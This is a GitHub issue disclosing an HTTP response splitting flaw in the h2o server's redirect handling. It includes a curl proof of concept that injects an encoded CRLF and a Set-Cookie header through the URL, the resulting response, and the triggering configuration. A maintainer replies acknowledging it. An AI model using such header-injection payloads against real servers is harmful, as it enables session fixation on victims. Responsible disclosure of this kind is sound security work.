Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

HTTP response splitting #682

Closed
nanorc opened this issue Jan 7, 2016 · 2 comments
Closed

HTTP response splitting #682

nanorc opened this issue Jan 7, 2016 · 2 comments

Comments

@nanorc
Copy link

nanorc commented Jan 7, 2016

Hi,

I found out that i can do HTTP response splitting in h2o by feeding the URL with carriage return
and new line (CRLF). Example:

$ curl -I "http://fooexample.com/en/%0d%0aset-cookie:test=test"
HTTP/1.1 301 Redirected
Date: Thu, 07 Jan 2016 08:56:34 GMT
Server: h2o/1.6.0
Connection: keep-alive
location: https://fooexample.com/en/
set-cookie:test=test
content-type: text/html; charset=utf-8

the h2o config:

hosts:
    "fooexample.com":
        listen:
            port: 80
        paths:
            "/":
                redirect:
                    status: 301
                    url: https://fooexample.com/
    "fooexample.com":
        listen:
            port: 443
            ssl:
                certificate-file: /path/to/fooexample.crt
                key-file:         /path/to/fooexample.key

This issue could lead to session fixation attack where an attacker could coerce a victim
into clicking a link with an injected predefined cookie

@kazuho
Copy link
Member

kazuho commented Jan 7, 2016

Thank you for reporting the issue. Looking into it.

@nanorc
Copy link
Author

nanorc commented Jan 8, 2016

thanks @kazuho

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants